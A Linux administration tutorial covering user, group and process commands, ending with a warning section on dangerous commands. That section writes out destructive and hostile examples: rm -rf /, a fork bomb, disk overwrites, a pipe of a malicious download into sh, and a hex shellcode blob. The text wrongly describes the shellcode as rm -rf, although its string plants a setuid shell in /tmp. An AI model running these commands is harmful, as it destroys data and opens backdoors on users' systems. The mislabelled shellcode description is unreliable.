
HND2

Network and Security

Linux Network Administration: NWS


TUTORIAL 1

Lecturer : Mavel TATKEU Email : maveltatkeu@gmail.com

Linux: Working with shell (part 2)

I- User and group


1- Create User in Linux

Use the adduser or useradd command to create user accounts on a Linux system. Some operating
systems provide only one of the two commands. Every user's entry is stored in the /etc/passwd file.
Syntax:
$ adduser [options] USER_NAME

adduser vs useradd command

On Debian systems, adduser is a separate Perl script that creates user accounts with enhanced options. It
uses the useradd command in the background to create the accounts. On Redhat and many other
derivatives, adduser is just a symlink to the useradd command.

Create User in Linux

Use the adduser command to create user test on your system. This will prompt for the password and
some other details on Debian systems.

$ adduser test

You can also override the default values with the adduser command. For example, to specify the home
directory and the default shell for the user:

$ adduser --home "/var/www/test" --shell "/bin/sh" test

2- Modify User in Linux

Use usermod command to modify/update existing user account in Linux.


Syntax:
$ usermod [options] USER_NAME

Example:
Change the default shell of user myuser to /usr/sbin/nologin. Use -s or --shell to update the default shell.
$ usermod --shell "/usr/sbin/nologin" myuser

Change Home Directory

Use the -d or --home switch to change the current home directory of a user. The new directory is created
automatically, but the parent directory of the new home must exist.

$ usermod --home "/var/home/myuser" myuser

You can also use -m or --move-home with the above switch to move the content of the home directory as well.

$ usermod --move-home --home "/var/home/myuser" myuser


Lock and Unlock User

Use -L or --lock to lock a specific account on a Linux system. Use -U or --unlock to unlock a locked user
account.

$ usermod --lock myuser ## Lock account

$ usermod --unlock myuser ## Unlock account


Change Primary Group

Use -g or --gid to forcefully change the user’s primary group. For example, set “staff” as the primary group
for the myuser account.

$ usermod --gid staff myuser


Adding User to Secondary Group

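Use -G or --groups to add a user to multiple secondary groups. For example, add myuser to the staff and accounts
groups. Without -a (--append), -G replaces the user's existing secondary groups with the given list; add -a to
keep the groups the user already belongs to.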

$ usermod -G staff,accounts myuser

3- Delete User in Linux

Use userdel command to delete existing user from Linux system.


Syntax:
$ userdel [options] USER_NAME

Example:
Below command will delete the user myuser from your system but keep the home directory.
$ userdel myuser

Use -r or --remove to also remove the home directory and its content.

$ userdel --remove myuser

4- Linux Add Group

Use groupadd or addgroup command to create new user group in Linux system.
Syntax:
$ addgroup GROUP_NAME

Example:
Let’s create a group named “testgroup”.

$ addgroup testgroup
Add User to Group

Use usermod command to add user in secondary group.

$ usermod -G testgroup testuser

You can view the names of the groups the user belongs to.

$ groups testuser

testuser : testuser testgroup

Assign Group during Create New User

You can also assign a specific group during the user creation process. This will also create the primary
group.

$ useradd -G testgroup rahul

5- Linux who command

The who command is used to find the users currently logged in to your system, along with other useful details.
You can find details like remote IP address, terminal, date/time of login, etc.
Syntax:
$ who [options]
Find All Login Users

List all users currently logged in to your system.

$ who

Output:

rahul pts/8 2017-09-05 16:23 (192.168.1.10)
root pts/9 2017-09-05 17:32 (192.168.1.13)
Find Current Login User
You can also use the following command to print username of current logged in user.

$ who am i

Output:
rahul pts/9 2017-09-05 17:32 (192.168.1.10)
6- Linux whoami command

Linux whoami command is used to get current logged in username. This command is most helpful with
Shell scripting to find if the current user is root or not.
Example:
$ whoami

Output:
rahul
7- Linux chage command

The chage command is used to set account expiration date for user. It also changes the time the user’s
password will expire.
Syntax:
$ chage [options] LOGIN
Examples:-

a) Set Password Expiry Days of User

Set the number of days after the last change at which the password expires. Here the user will be forced to change
the password 15 days after the last change.

$ chage -M 15 testuser
b) Set Account Password Expiry Warning Date

You can also set the password expiry warning period, so that the user is alerted before the password expires
and can change it in time.

$ chage -W 3 testuser

c) Set Account Expiry Date of User

You can also set the expiry date of any user in Linux system. The account will automatically deactivate
after passing the expiry date. Use the following command to set the expiration date of account to Nov 16,
2019.

$ chage --expiredate "16 NOV 2019" testuser


d) List Account Aging Details

Run the following command to view the aging details of the user account.

$ chage -l testuser
e) Disable Password and Account Expiry

You can disable the password and account expiry any time using the following command.

$ chage -I -1 -m 0 -M 99999 -E -1 testuser


f) Force User to Change Password

You can also set the expiry date to 0 to force a user to change the account's password on next login.

$ chage -d 0 testuser
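
The chage options above edit the aging fields of /etc/shadow (-d last change, -M maximum age, -W warning, -E account expiry). The script below is an added example, not part of the original tutorial: it audits those fields over constructed shadow-format lines. The names audit_aging and sample_shadow and the day number 20000 are assumptions made for the demo.

```shell
#!/usr/bin/env bash
# Added example: audit the aging fields that chage edits, read from
# shadow(5)-format lines: name:hash:lastchg:min:max:warn:inactive:expire:
# Day values count days since 1970-01-01, as in /etc/shadow.

# audit_aging TODAY_DAYS < shadow-format-lines
# Prints "user<TAB>finding" for each account that needs attention.
audit_aging() {
  awk -F: -v today="$1" '
    $2 ~ /^[!*]/ || $2 == "" { next }   # skip locked and no-password accounts
    {
      if ($3 == "0")
        print $1 "\tmust-change-at-next-login"   # state set by chage -d 0
      if ($5 == "" || $5 + 0 >= 99999)
        print $1 "\tpassword-never-expires"      # state set by chage -M 99999
      else if ($3 != "0" && $3 + $5 < today)
        print $1 "\tpassword-expired"            # last change + max age has passed
      if ($8 != "" && $8 + 0 <= today)
        print $1 "\taccount-expired"             # date set by chage -E has passed
    }'
}

# Constructed sample data (not real accounts or hashes).
sample_shadow() {
  cat <<'EOF'
root:$6$constructed$hash:19000:0:99999:7:::
testuser:$6$constructed$hash:19900:0:15:3:::
olduser:$6$constructed$hash:19000:0:90:7::19500:
newhire:$6$constructed$hash:0:0:15:3:::
daemon:*:19000:0:99999:7:::
EOF
}

# Real use (needs root): audit_aging "$(( $(date +%s) / 86400 ))" < /etc/shadow
sample_shadow | audit_aging 20000
```
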

II- Processes
Many of the commands here perform a single function and can be combined — that’s the Unix philosophy of designing
programs. Other programs, like htop, provide a friendly interface on top of the commands.
1- Linux top command
The top command is the traditional way to view your system’s resource usage and see the processes that
are taking up the most system resources. Top displays a list of processes, with the ones using the most
CPU at the top.

To exit top or htop, use the Ctrl-C keyboard shortcut. This keyboard shortcut usually kills the
currently running process in the terminal.

2- Linux htop command

The htop command is an improved top. It’s not installed by default on most Linux distributions — here’s
the command you’ll need to install it on Ubuntu:

sudo apt-get install htop

htop displays the same information with an easier-to-understand layout. It also lets you select processes with the
arrow keys and perform actions, such as killing them or changing their priority, with the F keys.
3- Linux ps command

The ps command lists running processes. The following command lists all processes running on your
system:

ps -A

This may be too many processes to read at one time, so you can pipe the output through
the less command to scroll through them at your own pace:

ps -A | less

Press q to exit when you’re done.

You could also pipe the output through grep to search for a specific process without using any other
commands. The following command would search for the Firefox process:

ps -A | grep firefox
4- Linux pstree command

The pstree command is another way of visualizing processes. It displays them in tree format. So, for
example, your X server and graphical environment would appear under the display manager that
spawned them.

5- Linux kill command

The kill command can kill a process, given its process ID. You can get this information from the ps -A,
top or pgrep commands.

kill PID

Technically speaking, the kill command can send any signal to a process. You can use kill -KILL or kill -9
instead to kill a stubborn process.

6- Linux pgrep command

Given a search term, pgrep returns the process IDs that match it. For example, you could use the
following command to find Firefox’s PID:
pgrep firefox
7- Linux pkill & killall command

The pkill and killall commands can kill a process, given its name. Use either command to kill Firefox:

pkill firefox
killall firefox
8- Linux renice command

The renice command changes the nice value of an already running process. The nice value determines
what priority the process runs with. A value of -19 is very high priority, while a value of 19 is very low
priority. A value of 0 is the default priority.

The renice command requires a process’s PID. The following command makes a process run with very
low priority:

renice 19 PID

You can use the pgrep trick above with renice, too.

If you’re making a process run at a higher priority, you’ll require root permissions. On Ubuntu,
use sudo for that:

sudo renice -19 PID


9- Linux xkill command

The xkill command is a way of easily killing graphical programs. Run it and your cursor will turn into
an x sign. Click a program’s window to kill that program. If you don’t want to kill a program, you can
back out of xkill by right-clicking instead.

III- Most Dangerous Commands – Never Execute on Linux


The Linux command line is productive, useful and interesting, but it can also be very dangerous,
especially when you are not sure what you are doing. This article is not intended to scare you away
from Linux or the Linux command line. We just want to make you aware of some of the commands which you
should think twice about before you execute them.

1- rm -rf Command

The rm -rf command is one of the fastest ways to delete a folder and its contents. But a little typo or
ignorance may result in unrecoverable system damage. Some of the options used with the rm
command are:
rm command in Linux is used to delete files.
rm -r command deletes the folder recursively, even the empty folder.
rm -f command removes ‘Read only File’ without asking.
rm -rf / : Force deletion of everything in root directory.
rm -rf * : Force deletion of everything in current directory/working directory.
rm -rf . : Force deletion of current folder and sub folders.
Hence, be careful when you are executing the rm -rf command. To guard against accidental deletion of files by the ‘rm‘
command, create an alias of the ‘rm‘ command as ‘rm -i‘ in the “.bashrc” file; it will ask you to confirm every
deletion.

2- :(){:|:&};: Command

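The above is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once
in the foreground and once in the background. It keeps on executing again and again till the system
freezes. A per-user process limit (ulimit -u, or an nproc entry in /etc/security/limits.conf) caps how many
processes it can create.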

:(){:|:&};:

3- command > /dev/sda

The above command writes the output of ‘command‘ to the block device /dev/sda. It writes
raw data, so all the files on the device are replaced with raw data, resulting in total loss of the data
on the device.
4- mv folder /dev/null

The above command will move ‘folder‘ to /dev/null. In Linux, /dev/null or the null device is a special file that
discards all the data written to it and reports that the write operation succeeded.
# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means
everything there was sent to blackhole (null).
5- wget http://malicious_source -O- | sh

The above command will download a script from a malicious source and then execute it. The wget command
downloads the script and sh executes the downloaded script.
Note: You should be very much aware of the source from which you are downloading packages and
scripts. Only use scripts/applications that are downloaded from a trusted source.
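
One way to apply the note above, as an added example that is not part of the original tutorial: save the download to a file, compare its SHA-256 with the digest the publisher lists, and only then run it. The function names verify_script, run_verified and demo are assumptions, the installer is a constructed stand-in so the demo runs offline, and the published digest is assumed to come from a channel separate from the download itself.

```shell
#!/usr/bin/env bash
# Added example: verify a downloaded script before running it,
# instead of piping the download straight into sh.

# verify_script FILE EXPECTED_SHA256 -> status 0 only on an exact digest match
verify_script() {
  local file="$1" expected actual
  expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')   # accept upper-case hex digests
  [ -f "$file" ] || { echo "missing: $file" >&2; return 2; }
  actual=$(sha256sum "$file" | awk '{print $1}')
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  echo "digest mismatch for $file" >&2
  echo "  expected $expected" >&2
  echo "  actual   $actual" >&2
  return 1
}

# run_verified FILE EXPECTED_SHA256 -> runs FILE with sh only if it verifies
run_verified() {
  verify_script "$1" "$2" && sh "$1"
}

# Constructed, offline demo. With a real download the first step would be
# saving the file (wget -O "$script" URL) and reading it before going further.
demo() {
  local dir script good
  dir=$(mktemp -d)
  script="$dir/install.sh"
  printf 'echo "installer ran"\n' > "$script"
  good=$(sha256sum "$script" | awk '{print $1}')   # stands in for the published digest

  run_verified "$script" "$good"                    # digest matches: script runs
  echo 'echo "tampered"' >> "$script"               # simulate modification in transit
  run_verified "$script" "$good" || echo "refused to run modified script"
  rm -r "$dir"
}
demo
```
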

6- mkfs.ext3 /dev/sda

The above command will format the block device ‘sda’, and as you surely know, after execution of
the above command your block device (Hard Disk Drive) would be new, BRAND NEW! Without any data, leaving
your system in an unrecoverable state.
7- > file

The above command is used to flush the content of a file. If it is executed with a typo or out of
ignorance, as in “> xt.conf”, it will overwrite that configuration file or any other system or configuration file.
8- ^foo^bar

This command is used to edit the previously run command without the need to retype the whole
command again. But it can be really troublesome if you do not thoroughly check the
change it makes to the original command.

9- dd if=/dev/random of=/dev/sda

The above command will wipe out the block device sda and write random junk data to it. Of course, your
system would be left in an inconsistent and unrecoverable state.
10- Hidden the Command

The below command is nothing but the first command above (rm -rf). Here the code is hidden in hex so
that an ignorant user may be fooled. Running the below code in your terminal will wipe
your root partition.
This shows that a threat may be hidden and is sometimes not easily detectable. You
must be aware of what you are doing and what the result would be. Don’t compile or run code from an
unknown source.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p

release */

= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″

“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″

“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″

“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″

“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″

“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″

“\x6e\x2f\x73\x68\x00\x2d\x63\x00″

“cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;”;

Note: Don’t execute any of the above commands in your Linux terminal or shell, or on your friend’s or school’s
computer. If you want to test them, run them in a virtual machine. Any inconsistency or data loss caused by
executing the above commands will break your system, and neither the author of the article
nor anyone else is responsible for it.
